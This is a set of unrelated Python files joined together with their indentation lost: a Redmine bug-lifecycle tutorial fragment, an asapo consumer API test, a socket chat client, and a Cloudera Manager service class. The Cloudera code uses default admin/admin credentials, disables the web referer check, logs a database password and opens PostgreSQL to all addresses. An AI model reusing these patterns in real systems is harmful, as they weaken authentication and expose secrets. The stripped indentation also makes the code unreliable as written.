if __name__ == '__main__':
redmine_gui.execute_script("window.scrollTo(0, document.body.scrollHeight);")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.get(redmine_url + "/issues/1/edit")
redmine_gui.find_element_by_id("issue_status_id").click()
if __name__ == '__main__':
redmine_gui.find_element_by_xpath("//option[text()='Resolved']").click()
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.execute_script("window.scrollTo(0, document.body.scrollHeight);")
issue_notes = redmine_gui.find_element_by_id("issue_notes")
issue_notes.send_keys("Will only work for Nokia Communicator Rev B and later; "
"Rev A is still unsupported")
screenshot(redmine_gui)
if __name__ == '__main__':
redmine_gui.find_element_by_name("commit").click()
screenshot(redmine_gui)
## The Life Cycle of an Issue
## --------------------------
if __name__ == '__main__':
print('\n## The Life Cycle of an Issue')
### Resolutions
if __name__ == '__main__':
print('\n### Resolutions')
#### FIXED
if __name__ == '__main__':
print('\n#### FIXED')
#### INVALID
if __name__ == '__main__':
print('\n#### INVALID')
#### WONTFIX
if __name__ == '__main__':
print('\n#### WONTFIX')
#### DUPLICATE
if __name__ == '__main__':
print('\n#### DUPLICATE')
#### WORKSFORME
if __name__ == '__main__':
print('\n#### WORKSFORME')
### An Issue Life Cycle
if __name__ == '__main__':
print('\n### An Issue Life Cycle')
from .Intro_Debugging import graph # minor dependency
if __name__ == '__main__':
from IPython.display import display
if __name__ == '__main__':
life_cycle = graph()
life_cycle.attr(rankdir='TB')
life_cycle.node('New', label="<<b>NEW</b>>", penwidth='2.0')
life_cycle.node('Assigned', label="<<b>ASSIGNED</b>>")
with life_cycle.subgraph() as res:
res.attr(rank='same')
res.node('Resolved', label="<<b>RESOLVED</b>>", penwidth='2.0')
res.node('Resolution',
shape='plain',
fillcolor='white',
label="""<<b>Resolution:</b> One of<br align="left"/>
• FIXED<br align="left"/>
• INVALID<br align="left"/>
• DUPLICATE<br align="left"/>
• WONTFIX<br align="left"/>
• WORKSFORME<br align="left"/>
>""")
res.node('Reopened', label="<<b>REOPENED</b>>", style='invis')
life_cycle.edge('New', 'Assigned', label=r"Assigned\lto developer")
life_cycle.edge('Assigned', 'Resolved', label="Developer has fixed bug")
life_cycle.edge('Resolution', 'Resolved', arrowhead='none', style='dashed')
life_cycle
if __name__ == '__main__':
life_cycle.node('Unconfirmed', label="<<b>UNCONFIRMED</b>>", penwidth='2.0')
# life_cycle.node('Verified', label="<<b>VERIFIED</b>>")
life_cycle.node('Closed', label="<<b>CLOSED</b>>", penwidth='2.0')
life_cycle.node('Reopened', label="<<b>REOPENED</b>>", style='filled')
life_cycle.node('New', label="<<b>NEW</b>>", penwidth='1.0')
life_cycle.edge('Unconfirmed', 'New', label="Confirmed as \"new\"")
life_cycle.edge('Unconfirmed', 'Closed', label=r"Resolved\las \"invalid\"\lor \"duplicate\"")
life_cycle.edge('Assigned', 'New', label="Unassigned")
life_cycle.edge('Resolved', 'Closed', label=r"Quality Assurance\lconfirms fix")
life_cycle.edge('Resolved', 'Reopened', label=r"Quality Assurance\lnot satisfied")
life_cycle.edge('Reopened', 'Assigned', label=r"Assigned\lto developer")
# life_cycle.edge('Verified', 'Closed', label="Bug is closed")
life_cycle.edge('Closed', 'Reopened', label=r"Bug is\lreopened")
life_cycle
if __name__ == '__main__':
redmine_process.terminate()
redmine_gui.close()
if __name__ == '__main__':
os.system("pkill ruby");
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## Lessons Learned
## ---------------
if __name__ == '__main__':
print('\n## Lessons Learned')
## Next Steps
## ----------
if __name__ == '__main__':
print('\n## Next Steps')
## Background
## ----------
if __name__ == '__main__':
print('\n## Background')
|
consumer_api.py
|
from __future__ import print_function
import asapo_consumer
import json
import sys
import time
from threading import Thread
thread_res = 0
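# exit_on_noerr() is called when an expected exception was *not* raised:
# it reports the test name and aborts.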
def exit_on_noerr(name):
print(name)
sys.exit(1)
def assert_metaname(meta, compare, name):
print("asserting meta for " + name)
if meta['name'] != compare:
print("error at " + name)
print('meta: ', json.dumps(meta, indent=4, sort_keys=True))
sys.exit(1)
def assert_usermetadata(meta, name):
print("asserting usermetadata for " + name)
if meta['meta']['test'] != 10:
print('meta: ', json.dumps(meta, indent=4, sort_keys=True))
print("error at " + name)
print('meta: ', json.dumps(meta, indent=4, sort_keys=True))
sys.exit(1)
def assert_version(version):
print("asserting version ",version)
ok = version['supported'] and version['client'] and version['server']
if not ok:
sys.exit(1)
def assert_eq(val, expected, name):
print("asserting eq for " + name)
if val != expected:
print("error at " + name)
print('val: ', val, ' expected: ', expected)
sys.exit(1)
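# check_file_transfer_service() fetches message data by id from two streams and
# verifies the payload; it exercises retrieval through the consumer created
# without direct filesystem access (consumer_fts below).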
def check_file_transfer_service(consumer, group_id):
consumer.set_timeout(1000)
data, meta = consumer.get_by_id(1,stream = "stream1", meta_only=False)
assert_eq(data.tostring().decode("utf-8"), "hello1", "check_file_transfer_service ok")
data, meta = consumer.get_by_id(1, meta_only=False, stream = "streamfts")
assert_eq(data.tostring().decode("utf-8"), "hello1", "check_file_transfer_service with auto size ok")
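# check_single() exercises the consumer API on single-message streams:
# get_next/get_last/get_by_id, read markers, stream listings, acknowledgements,
# resending, queries, metadata, stream deletion, and interrupting a blocked call.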
def check_single(consumer, group_id):
global thread_res
version = consumer.get_version_info()
assert_version(version)
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "1", "get next1")
assert_usermetadata(meta, "get next1")
consumer.set_timeout(1000)
data = consumer.retrieve_data(meta)
assert_eq(data.tostring().decode("utf-8"), "hello1", "retrieve_data data")
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "2", "get next2")
assert_usermetadata(meta, "get next2")
_, meta = consumer.get_last(meta_only=True)
assert_metaname(meta, "5", "get last1")
assert_usermetadata(meta, "get last1")
# get last in group
_, meta = consumer.get_last(meta_only=True,group_id=group_id)
assert_metaname(meta, "5", "get last in group")
try:
consumer.get_last(meta_only=True,group_id=group_id)
except asapo_consumer.AsapoEndOfStreamError:
pass
else:
exit_on_noerr("get last in group error second time")
try:
consumer.get_by_id(30, meta_only=True)
except asapo_consumer.AsapoEndOfStreamError:
pass
else:
exit_on_noerr("get_by_id no data")
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "3", "get next3")
size = consumer.get_current_size()
assert_eq(size, 5, "get_current_size")
try:
size = consumer.get_current_dataset_count(include_incomplete = True)
except asapo_consumer.AsapoWrongInputError as err:
pass
else:
exit_on_noerr("get_current_dataset_count for single messages err")
consumer.reset_lastread_marker(group_id)
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "1", "get next4")
assert_usermetadata(meta, "get next4")
_, meta = consumer.get_by_id(3, meta_only=True)
assert_metaname(meta, "3", "get get_by_id")
assert_usermetadata(meta, "get get_by_id")
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "2", "get next5")
assert_usermetadata(meta, "get next5")
consumer.set_lastread_marker(group_id,4)
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "5", "get next6")
assert_usermetadata(meta, "get next6")
try:
consumer.get_last(meta_only=False)
except asapo_consumer.AsapoLocalIOError as err:
print(err)
pass
else:
exit_on_noerr("io error")
_, meta = consumer.get_next(group_id, meta_only=True, stream = "stream1")
assert_metaname(meta, "11", "get next stream1")
_, meta = consumer.get_next(group_id, meta_only=True, stream = "stream2")
assert_metaname(meta, "21", "get next stream2")
streams = consumer.get_stream_list("","all")
assert_eq(len(streams), 4, "number of streams")
print(streams)
assert_eq(streams[0]["name"], "default", "streams_name1")
assert_eq(streams[0]["finished"], False, "streams_finished1")
assert_eq(streams[1]["name"], "streamfts", "streams_name2")
assert_eq(streams[2]["name"], "stream1", "streams_name2")
assert_eq(streams[3]["name"], "stream2", "streams_name3")
assert_eq(streams[1]["timestampCreated"], 1000, "streams_timestamp2")
assert_eq(streams[2]["timestampLast"], 2000, "streams_timestamplast2")
assert_eq(streams[2]["finished"], True, "streams_finished2")
assert_eq(streams[2]["nextStream"], "ns", "next stream 2")
assert_eq(streams[2]["lastId"], 5, "last id stream 2")
assert_eq(streams[3]["finished"], True, "streams_finished3")
assert_eq(streams[3]["nextStream"], "", "next stream 3")
assert_eq(streams[3]["lastId"], 5, "last id stream 3")
finished_streams = consumer.get_stream_list("","finished")
assert_eq(len(finished_streams), 2, "number of finished streams")
assert_eq(finished_streams[0]["name"], "stream1", "finished streams_name1")
unfinished_streams = consumer.get_stream_list("","unfinished")
assert_eq(len(unfinished_streams), 2, "number of unfinished streams")
assert_eq(unfinished_streams[0]["name"], "default", "unfinished streams_name1")
# acks
try:
id = consumer.get_last_acknowledged_message(group_id)
except asapo_consumer.AsapoNoDataError as err:
print(err)
pass
else:
exit_on_noerr("get_last_acknowledged_message")
nacks = consumer.get_unacknowledged_messages(group_id)
assert_eq(len(nacks), 5, "nacks default stream size = 5")
consumer.acknowledge(group_id, 1)
try:
consumer.acknowledge(group_id, 1)
except asapo_consumer.AsapoWrongInputError as err:
print(err)
pass
else:
exit_on_noerr("should be wrong input on second ack")
nacks = consumer.get_unacknowledged_messages(group_id)
assert_eq(len(nacks), 4, "nacks default stream size = 4")
id = consumer.get_last_acknowledged_message(group_id)
assert_eq(id, 1, "last ack default stream id = 1")
consumer.acknowledge(group_id, 1, "stream1")
nacks = consumer.get_unacknowledged_messages(group_id)
assert_eq(len(nacks), 4, "nacks stream1 size = 4 after ack")
# neg acks
consumer.reset_lastread_marker(group_id)
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "1", "get next neg ack before resend")
consumer.reset_lastread_marker(group_id)
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "1", "get next neg ack with resend")
# resend
consumer.reset_lastread_marker(group_id)
consumer.set_resend_nacs(True, 0, 1)
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "1", "get next before resend")
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "1", "get next with resend")
_, meta = consumer.get_next(group_id, meta_only=True)
assert_metaname(meta, "2", "get next after resend")
# messages
messages = consumer.query_messages("meta.test = 10")
assert_eq(len(messages), 5, "size of query answer 1")
for message in messages:
assert_usermetadata(message, "query_messages")
messages = consumer.query_messages("meta.test = 10 AND name='1'")
assert_eq(len(messages), 1, "size of query answer 2 ")
for message in messages:
assert_usermetadata(message, "query_messages")
messages = consumer.query_messages("meta.test = 11")
assert_eq(len(messages), 0, "size of query answer 3 ")
try:
messages = consumer.query_messages("bla")
except:
pass
else:
exit_on_noerr("wrong query")
# metadata
bt_meta = consumer.get_beamtime_meta()
assert_eq(bt_meta['data'], 'test_bt', "beamtime meta ")
st_meta = consumer.get_stream_meta("test")
assert_eq(st_meta['data'], 'test_st', "stream meta ")
try:
consumer.get_stream_meta("notexist")
except asapo_consumer.AsapoNoDataError as err:
print(err)
pass
else:
exit_on_noerr("should be wrong input on non existing stream")
# delete stream
consumer.delete_stream(stream='default')
try:
consumer.delete_stream()
except asapo_consumer.AsapoWrongInputError as err:
print(err)
pass
else:
exit_on_noerr("should be AsapoWrongInputError on delete stream second time ")
consumer.delete_stream(error_on_not_exist = False)
# constructors
consumer = asapo_consumer.create_consumer("bla", path, True, beamtime, "", token, 1000)
try:
consumer.get_last(meta_only=True)
except asapo_consumer.AsapoUnavailableServiceError as err:
print(err)
pass
else:
exit_on_noerr("AsapoconsumerServersNotFound")
try:
asapo_consumer.create_consumer("", "", True, "", "", "", 1000)
except asapo_consumer.AsapoWrongInputError as err:
print(err)
pass
else:
exit_on_noerr("should be AsapoWrongInputError")
# interrupt
thread_res = 0
def long_call(consumer):
global thread_res
try:
consumer.get_last(meta_only=True)
thread_res = 1
except asapo_consumer.AsapoInterruptedTransactionError as err:
print(err)
thread_res = 2
pass
else:
print("interrupt test failed")
thread_res = 3
pass
consumer = asapo_consumer.create_consumer("bla", path, True, beamtime, "", token, 60000)
t = Thread(target = long_call, args = (consumer,) )
t.start()
time.sleep(1)
consumer.interrupt_current_operation()
t.join()
assert_eq(thread_res, 2, "long call res")
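# check_dataset() exercises the dataset API: get_next_dataset/get_last_dataset/
# get_dataset_by_id, dataset counts, and incomplete datasets with and without
# a min_size argument.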
def check_dataset(consumer, group_id):
res = consumer.get_next_dataset(group_id)
assert_eq(res['id'], 1, "get_next_dataset1")
assert_metaname(res['content'][0], "1_1", "get nextdataset1 name1")
assert_metaname(res['content'][1], "1_2", "get nextdataset1 name2")
assert_usermetadata(res['content'][0], "get nextdataset1 meta")
consumer.set_timeout(1000)
data = consumer.retrieve_data(res['content'][0])
assert_eq(data.tostring().decode("utf-8"), "hello1", "retrieve_data from dataset data")
res = consumer.get_next_dataset(group_id)
assert_eq(res['id'], 2, "get_next_dataset2")
assert_metaname(res['content'][0], "2_1", "get nextdataset2 name1")
res = consumer.get_last_dataset()
assert_eq(res['id'], 10, "get_last_dataset1")
assert_eq(res['expected_size'], 3, "get_last_dataset1 size ")
assert_metaname(res['content'][2], "10_3", "get get_last_dataset1 name3")
# get last dataset in group
res = consumer.get_last_dataset(group_id=group_id)
assert_eq(res['id'], 10, "get_last_dataset in group")
try:
consumer.get_last_dataset(group_id=group_id)
except asapo_consumer.AsapoEndOfStreamError:
pass
else:
exit_on_noerr("get last dataset in group error second time")
res = consumer.get_next_dataset(group_id)
assert_eq(res['id'], 3, "get_next_dataset3")
res = consumer.get_dataset_by_id(8)
assert_eq(res['id'], 8, "get_dataset_by_id1 id")
assert_metaname(res['content'][2], "8_3", "get get_dataset_by_id1 name3")
size = consumer.get_current_dataset_count()
assert_eq(size, 10, "get_current_dataset_count")
# incomplete datesets without min_size given
try:
consumer.get_next_dataset(group_id, stream = "incomplete")
except asapo_consumer.AsapoPartialDataError as err:
assert_eq(err.partial_data['expected_size'], 3, "get_next_dataset incomplete expected size")
assert_eq(err.partial_data['id'], 1, "get_next_dataset incomplete id")
assert_eq(err.partial_data['content'][0]['name'], '1_1', "get_next_dataset content 1")
assert_eq(err.partial_data['content'][1]['name'], '1_2', "get_next_dataset content 2")
pass
else:
exit_on_noerr("get_next_dataset incomplete err")
try:
consumer.get_dataset_by_id(2, stream = "incomplete")
except asapo_consumer.AsapoPartialDataError as err:
assert_eq(err.partial_data['expected_size'], 3, "get_next_dataset incomplete expected size")
assert_eq(err.partial_data['id'], 2, "get_next_dataset incomplete id")
assert_eq(err.partial_data['content'][0]['name'], '2_1', "get_next_dataset content 1")
assert_eq(err.partial_data['content'][1]['name'], '2_2', "get_next_dataset content 2")
pass
else:
exit_on_noerr("get_next_dataset incomplete err")
try:
consumer.get_last_dataset(stream = "incomplete")
except asapo_consumer.AsapoEndOfStreamError as err:
pass
else:
exit_on_noerr("get_last_dataset incomplete err")
# incomplete with min_size given
res = consumer.get_next_dataset(group_id, min_size=2, stream = "incomplete")
assert_eq(res['id'], 2, "get_next_dataset incomplete with minsize")
res = consumer.get_last_dataset(min_size=2, stream = "incomplete")
assert_eq(res['id'], 5, "get_last_dataset incomplete with minsize")
res = consumer.get_dataset_by_id(2, min_size=1, stream = "incomplete")
assert_eq(res['id'], 2, "get_dataset_by_id incomplete with minsize")
size = consumer.get_current_dataset_count(stream = "incomplete", include_incomplete = False)
assert_eq(size, 0, "get_current_dataset_count excluding incomplete")
size = consumer.get_current_dataset_count(stream = "incomplete", include_incomplete = True)
assert_eq(size, 5, "get_current_dataset_count including incomplete")
size = consumer.get_current_size(stream = "incomplete") # should work as well
assert_eq(size, 5, "get_current_size for datasets")
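# Command-line driver: consumer_api.py <source> <path> <beamtime> <token> <mode>,
# where <mode> is "single" or "datasets".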
source, path, beamtime, token, mode = sys.argv[1:]
consumer = asapo_consumer.create_consumer(source, path, True, beamtime, "", token, 60000)
consumer_fts = asapo_consumer.create_consumer(source, path, False, beamtime, "", token, 60000)
group_id = consumer.generate_group_id()
group_id_fts = consumer_fts.generate_group_id()
if mode == "single":
check_single(consumer, group_id)
check_file_transfer_service(consumer_fts, group_id_fts)
if mode == "datasets":
check_dataset(consumer, group_id)
print("tests done")
sys.exit(0)
|
Client.py
|
# coding: utf-8
#########################################################################
# Website: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import socket, threading, CrazyitProtocol, os
from tkinter import simpledialog
import time
SERVER_PORT = 30000
# Define a function that reads keyboard input and sends it over the network
def read_send(s):
# Keep reading keyboard input in an infinite loop
while True:
line = input('')
if line is None or line == 'exit':
break
# If the message contains a colon and starts with //, treat it as a private message
if ":" in line and line.startswith("//"):
line = line[2:]
s.send((CrazyitProtocol.PRIVATE_ROUND
+ line.split(":")[0] + CrazyitProtocol.SPLIT_SIGN
+ line.split(":")[1] + CrazyitProtocol.PRIVATE_ROUND).encode('utf-8'))
else:
s.send((CrazyitProtocol.MSG_ROUND + line
+ CrazyitProtocol.MSG_ROUND).encode('utf-8'))
# Create the socket object
s = socket.socket()
try:
# Connect to the remote host
s.connect(('192.168.1.88', SERVER_PORT))
tip = ""
# Keep prompting for a user name in a loop
while True:
user_name = input(tip + 'Enter user name:\n') # ①
# Wrap the entered user name in protocol strings and send it
s.send((CrazyitProtocol.USER_ROUND + user_name
+ CrazyitProtocol.USER_ROUND).encode('utf-8'))
time.sleep(0.2)
# Read the server's response
result = s.recv(2048).decode('utf-8')
if result is not None and result != '':
# If the user name is already taken, start the next iteration
if result == CrazyitProtocol.NAME_REP:
tip = "用户名重复!请重新"
continue
# If the server reports a successful login, end the loop
if result == CrazyitProtocol.LOGIN_SUCCESS:
break
# On exception, close the network resources and exit the program
except:
print("网络异常!请重新登录!")
s.close()
os._exit(1)
def client_target(s):
try:
# Keep reading data from the socket and print it
while True:
line = s.recv(2048).decode('utf-8')
if line is not None:
print(line)
# This example only prints what it reads from the server. In practice the
# situation can be more complex: if the client should show the list of users
# in the chat room, the server can resend the complete user list to all
# clients whenever a user logs in or out. To distinguish chat messages from
# user lists, the server should likewise wrap the information it sends in
# protocol strings, and the client then dispatches on those strings.
# An even more complex case:
# if the two ends play a game (say, Gomoku), game data such as move
# coordinates must be sent as well; the server again wraps these coordinates
# in protocol strings, so the client can tell the opponent's moves apart.
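# A minimal sketch of such dispatching (the markers and helpers below are
# hypothetical, not part of the CrazyitProtocol used in this example):
#     if line.startswith(USER_LIST_ROUND):
#         update_user_list(line)        # hypothetical helper
#     elif line.startswith(GAME_MOVE_ROUND):
#         handle_opponent_move(line)    # hypothetical helper
#     else:
#         print(line)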
# Use a finally block to close the socket associated with this thread
finally:
s.close()
# Start the client thread
threading.Thread(target=client_target, args=(s,)).start()
read_send(s)
|
clouderamanager.py
|
import os
import time
import threading
# import subprocess
import socket
# import re
# Ansible <v2 has a security vulnerability and v2 has a different API
# Disabling Cloudera manager as don't believe it's used by anyone any more.
# from ansible.runner import Runner
# from ansible.inventory import Inventory
from cm_api.api_client import ApiResource # Cloudera Manager API
from cm_api.api_client import ApiException
# from cm_api.endpoints.clusters import ApiCluster
# from cm_api.endpoints.clusters import create_cluster
# from cm_api.endpoints.parcels import ApiParcel
from cm_api.endpoints.parcels import get_parcel
# from cm_api.endpoints.cms import ClouderaManager
from cm_api.endpoints.services import ApiServiceSetupInfo
# from cm_api.endpoints.services import ApiService, create_service
# from cm_api.endpoints.types import ApiCommand, ApiRoleConfigGroupRef
# from cm_api.endpoints.role_config_groups import get_role_config_group
# from cm_api.endpoints.role_config_groups import ApiRoleConfigGroup
# from cm_api.endpoints.roles import ApiRole
from time import sleep
from cm.util import misc
import cm.util.paths as paths
from cm.services import ServiceRole
from cm.services import service_states
from cm.services.apps import ApplicationService
import logging
log = logging.getLogger('cloudman')
NUM_START_ATTEMPTS = 2 # Number of times we attempt to auto-restart the service
class ClouderaManagerService(ApplicationService):
def __init__(self, app):
super(ClouderaManagerService, self).__init__(app)
self.svc_roles = [ServiceRole.CLOUDERA_MANAGER]
self.name = ServiceRole.to_string(ServiceRole.CLOUDERA_MANAGER)
self.dependencies = []
self.remaining_start_attempts = NUM_START_ATTEMPTS
self.db_pwd = misc.random_string_generator()
# Indicate if the web server has been configured and started
self.started = False
self.cm_port = 7180
# Default cluster configuration
# TODO - read local cloud host name!
# self.cm_host = socket.gethostname()
self.cm_host = self.app.cloud_interface.get_local_hostname()
self.host_list = []
self.cluster_name = "Cluster 1"
self.cdh_version = "CDH5"
self.cdh_version_number = "5"
self.cm_username = "admin"
self.cm_password = "admin"
self.mgmt_service_name = "ManagementService"
self.host_username = "ubuntu"
self.host_password = self.app.config.get('password')
self.cm_repo_url = None
self.service_types_and_names = {
"HDFS": "HDFS",
"YARN": "YARN"
}
@property
def cm_api_resource(self):
ar = None
try:
ar = ApiResource(self.cm_host, self.cm_port,
self.cm_username, self.cm_password)
ar.echo('Authenticated') # Issue a sample request to test the conn
except ApiException, aexc:
if aexc.code == 401:
log.debug("Changing default API username to {0}".format(self.cm_username))
self.cm_username = self.host_username
self.cm_password = self.host_password
ar = ApiResource(self.cm_host, self.cm_port,
self.cm_username, self.cm_password)
else:
log.error("Api Exception connecting to ClouderaManager: {0}".format(aexc))
except Exception, exc:
log.debug("Exception connecting to ClouderaManager: {0}".format(exc))
return ar
@property
def cm_manager(self):
if self.cm_api_resource:
return self.cm_api_resource.get_cloudera_manager()
else:
log.debug("No cm_api_resource; cannot get cm_manager")
return None
def start(self):
"""
Start Cloudera Manager web server.
"""
log.debug("Starting Cloudera Manager service")
self.state = service_states.STARTING
misc.run('/sbin/sysctl vm.swappiness=0') # Recommended by Cloudera
threading.Thread(target=self.__start).start()
def __start(self):
"""
Start all the service components.
Intended to be called in a dedicated thread.
"""
try:
self.configure_db()
self.start_webserver()
self.set_default_user()
# self.create_cluster()
# self.setup_cluster()
self.remaining_start_attempts -= 1
except Exception, exc:
log.error("Exception creating a cluster: {0}".format(exc))
def remove(self, synchronous=False):
"""
Stop the Cloudera Manager web server.
"""
log.info("Stopping Cloudera Manager service")
super(ClouderaManagerService, self).remove(synchronous)
self.state = service_states.SHUTTING_DOWN
try:
if self.cm_api_resource:
cluster = self.cm_api_resource.get_cluster(self.cluster_name)
cluster.stop()
except Exception, exc:
log.error("Exception stopping cluster {0}: {1}".format(self.cluster_name, exc))
if misc.run("service cloudera-scm-server stop"):
self.state = service_states.SHUT_DOWN
def configure_db(self):
"""
Add the necessary tables to the default PostgreSQL server running on the
host and prepare the necessary roles and databases.
"""
# Update psql settings
pg_conf = paths.P_PG_CONF
lif = ["listen_addresses = '*'",
"shared_buffers = 256MB",
"wal_buffers = 8MB",
"checkpoint_segments = 16",
"checkpoint_completion_target = 0.9"]
for l in lif:
log.debug("Updating PostgreSQL conf file {0} setting: {1}".format(pg_conf, l))
regexp = ' '.join(l.split(' ')[:2])
log.warning("(1) Configuring DB has been disabled!")
# Requires upgrade to Ansible v2
# try:
# Runner(inventory=Inventory(['localhost']),
# transport='local',
# become=True,
# become_user='postgres',
# module_name="lineinfile",
# module_args=('dest={0} backup=yes line="{1}" owner=postgres regexp="{2}"'
# .format(pg_conf, l, regexp))
# ).run()
# except Exception, e:
# log.error("Exception updating psql conf {0}: {1}".format(l, e))
# Restart psql
misc.run("service postgresql restart")
# Add required roles to the main Postgres server
roles = ['scm', 'amon', 'rman', 'hive']
for role in roles:
log.debug("Adding PostgreSQL role {0} (with pwd: {1})".format(role,
self.db_pwd))
log.warning("(2) Configuring DB has been disabled!")
# Requires upgrade to Ansible v2
# try:
# Runner(inventory=Inventory(['localhost']),
# transport='local',
# become=True,
# become_user='postgres',
# module_name="postgresql_user",
# module_args=("name={0} role_attr_flags=LOGIN password={1}"
# .format(role, self.db_pwd))
# ).run()
# except Exception, e:
# log.error("Exception creating psql role {0}: {1}".format(role, e))
# Create required databases
databases = ['scm', 'amon', 'rman', 'metastore']
for db in databases:
owner = db
if db == 'metastore':
owner = 'hive'
log.debug("Creating database {0} with owner {1}".format(db, owner))
log.warning("(3) Configuring DB has been disabled!")
# Requires upgrade to Ansible v2
# try:
# r = Runner(inventory=Inventory(['localhost']),
# transport='local',
# become=True,
# become_user='postgres',
# module_name="postgresql_db",
# module_args=("name={0} owner={1} encoding='UTF-8'"
# .format(db, owner))
# ).run()
# if r.get('contacted', {}).get('localhost', {}).get('failed'):
# msg = r.get('contacted', {}).get('localhost', {}).get('msg', 'N/A')
# log.error("Creating the database filed: {0}".format(msg))
# except Exception, e:
# log.error("Exception creating database {0}: {1}".format(db, e))
# Alter one of the DBs
sql_cmds = [
"ALTER DATABASE metastore SET standard_conforming_strings = off"
]
for sql_cmd in sql_cmds:
misc.run_psql_command(sql_cmd, 'postgres', self.app.path_resolver.psql_cmd, 5432)
# Prepare the scm database
cmd = ("/usr/share/cmf/schema/scm_prepare_database.sh -h localhost postgresql scm scm {0}"
.format(self.db_pwd))
misc.run(cmd)
# Make sure we have a clean DB env
f = '/etc/cloudera-scm-server/db.mgmt.properties'
if os.path.exists(f):
log.debug("Deleting file {0}".format(f))
os.remove(f)
def start_webserver(self):
"""
Start the Cloudera Manager web server (defaults to port 7180)
"""
def _disable_referer_check():
log.debug("Disabling refered check")
config = {u'REFERER_CHECK': u'false',
u'REMOTE_PARCEL_REPO_URLS': u'http://archive.cloudera.com/cdh5/parcels/5.4.1/'}
done = False
self.state = service_states.CONFIGURING
while not done:
try:
self.cm_manager.update_config(config)
log.debug("Succesfully disabled referer check")
done = True
self.started = True
except Exception:
log.debug("Still have not disabled referer check... ")
time.sleep(15)
if self.state in [service_states.SHUTTING_DOWN,
service_states.SHUT_DOWN,
service_states.ERROR]:
log.debug("Service state {0}; not configuring ClouderaManager."
.format(self.state))
done = True
if misc.run("service cloudera-scm-server start"):
_disable_referer_check()
def set_default_user(self):
"""
Replace the default 'admin' user with a default system one (generally
``ubuntu``) and its password.
"""
host_username_exists = default_username_exists = False
existing_users = self.cm_api_resource.get_all_users().to_json_dict().get('items', [])
for existing_user in existing_users:
if existing_user.get('name', None) == self.host_username:
host_username_exists = True
if existing_user.get('name', None) == 'admin':
default_username_exists = True
if not host_username_exists:
log.debug("Setting default user to {0}".format(self.host_username))
# Create new admin user (use 'ubuntu' and password provided at cloudman startup)
self.cm_api_resource.create_user(self.host_username, self.host_password, ['ROLE_ADMIN'])
else:
log.debug("Admin user {0} exists.".format(self.host_username))
if default_username_exists:
# Delete the default 'admin' user
old_admin = self.cm_username
self.cm_username = self.host_username
self.cm_password = self.host_password
log.debug("Deleting the old default user 'admin'...")
self.cm_api_resource.delete_user(old_admin)
def init_cluster(self, api):
"""
Create a new cluster and add hosts to it.
"""
cluster = api.create_cluster(self.cluster_name, self.cdh_version_number)
# Add the CM host to the list of hosts to add in the cluster so it can run the management services
all_hosts = list(self.host_list)
all_hosts.append(self.cm_host)
cluster.add_hosts(all_hosts)
return cluster
def deploy_management(self, manager):
"""
Create and deploy new management service
"""
MGMT_SERVICE_CONFIG = {
'zookeeper_datadir_autocreate': 'true',
}
MGMT_ROLE_CONFIG = {
'quorumPort': 2888,
}
AMON_ROLENAME = "ACTIVITYMONITOR"
AMON_ROLE_CONFIG = {
'firehose_database_host': self.cm_host + ":7432",
'firehose_database_user': 'amon',
'firehose_database_password': self.db_pwd,
'firehose_database_type': 'postgresql',
'firehose_database_name': 'amon',
'firehose_heapsize': '215964392',
}
APUB_ROLENAME = "ALERTPUBLISHER"
APUB_ROLE_CONFIG = {}
ESERV_ROLENAME = "EVENTSERVER"
ESERV_ROLE_CONFIG = {
'event_server_heapsize': '215964392'
}
HMON_ROLENAME = "HOSTMONITOR"
HMON_ROLE_CONFIG = {}
SMON_ROLENAME = "SERVICEMONITOR"
SMON_ROLE_CONFIG = {}
NAV_ROLENAME = "NAVIGATOR"
NAV_ROLE_CONFIG = {
'navigator_database_host': self.cm_host + ":7432",
'navigator_database_user': 'nav',
'navigator_database_password': self.db_pwd,
'navigator_database_type': 'postgresql',
'navigator_database_name': 'nav',
'navigator_heapsize': '215964392',
}
NAVMS_ROLENAME = "NAVIGATORMETADATASERVER"
NAVMS_ROLE_CONFIG = {}
RMAN_ROLENAME = "REPORTMANAGER"
RMAN_ROLE_CONFIG = {
'headlamp_database_host': self.cm_host + ":7432",
'headlamp_database_user': 'rman',
'headlamp_database_password': self.db_pwd,
'headlamp_database_type': 'postgresql',
'headlamp_database_name': 'rman',
'headlamp_heapsize': '215964392',
}
mgmt = manager.create_mgmt_service(ApiServiceSetupInfo())
# create roles. Note that host id may be different from host name (especially in CM 5). Look it up in /api/v5/hosts
mgmt.create_role(AMON_ROLENAME + "-1", "ACTIVITYMONITOR", self.cm_host)
mgmt.create_role(APUB_ROLENAME + "-1", "ALERTPUBLISHER", self.cm_host)
mgmt.create_role(ESERV_ROLENAME + "-1", "EVENTSERVER", self.cm_host)
mgmt.create_role(HMON_ROLENAME + "-1", "HOSTMONITOR", self.cm_host)
mgmt.create_role(SMON_ROLENAME + "-1", "SERVICEMONITOR", self.cm_host)
# mgmt.create_role(NAV_ROLENAME + "-1", "NAVIGATOR", self.cm_host)
# mgmt.create_role(NAVMS_ROLENAME + "-1", "NAVIGATORMETADATASERVER", self.cm_host)
# mgmt.create_role(RMAN_ROLENAME + "-1", "REPORTSMANAGER", self.cm_host)
# now configure each role
for group in mgmt.get_all_role_config_groups():
if group.roleType == "ACTIVITYMONITOR":
group.update_config(AMON_ROLE_CONFIG)
elif group.roleType == "ALERTPUBLISHER":
group.update_config(APUB_ROLE_CONFIG)
elif group.roleType == "EVENTSERVER":
group.update_config(ESERV_ROLE_CONFIG)
elif group.roleType == "HOSTMONITOR":
group.update_config(HMON_ROLE_CONFIG)
